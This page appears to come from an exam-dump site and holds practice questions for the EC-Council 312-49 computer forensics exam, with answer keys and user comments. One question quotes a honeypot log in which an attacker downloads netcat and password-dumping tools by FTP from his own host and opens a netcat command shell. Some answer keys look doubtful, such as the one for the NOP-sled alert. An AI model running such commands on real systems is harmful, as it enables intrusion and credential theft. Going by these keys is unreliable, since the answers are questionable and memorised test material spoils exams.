Free 312-49 Exam Braindumps (page: 10)

Page 10 of 133

If a suspect computer is located in an area that may have toxic chemicals, you must:

  1. coordinate with the HAZMAT team
  2. determine a way to obtain the suspect computer
  3. assume the suspect machine is contaminated
  4. do not enter alone

Answer(s): A



The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful.
(Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.)

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

  1. An IDS evasion technique
  2. A buffer overflow attempt
  3. A DNS zone transfer
  4. Data being retrieved from 63.226.81.13

Answer(s): A



What happens when a file is deleted by a Microsoft operating system using the FAT file system?

  1. only the reference to the file is removed from the FAT
  2. the file is erased and cannot be recovered
  3. a copy of the file is stored and the original file is erased
  4. the file is erased but can be recovered

Answer(s): A



The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k
  2. There are two attackers on the system - johna2k and haxedj00
  3. The attack is a remote exploit and the hacker downloads three files
  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer(s): C

Explanation:

The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.



Page 10 of 133



Post your Comments and Discuss EC-Council 312-49 exam with other Community members:

Valery commented on August 13, 2024
What version of exam have this dumps?
KAZAKHSTAN
upvote

Moorthy commented on June 01, 2024
This is the best place to pratice C_CPI_15 exam.
Anonymous
upvote

Carlos commented on February 29, 2024
@AKM, I took this exam about 2 weeks ago. The questions in this exam dumps are very similar to the exam. However some answers were not that accurate. I got the full PDF version with the testing software called Xengien app. It did help me pass my exam. So yes, it is worth it.
UNITED STATES
upvote

AKM commented on February 29, 2024
Have anyone took the test after practicing here? What is accuracy of this question compared to actual test
INDIA
upvote

SA commented on February 07, 2024
Great place to test your preparation.
INDIA
upvote

Balu commented on November 03, 2014
Thank you so much for helping me on this. Let me have a look on this and will provide further update as soon as possible.
UNITED STATES
upvote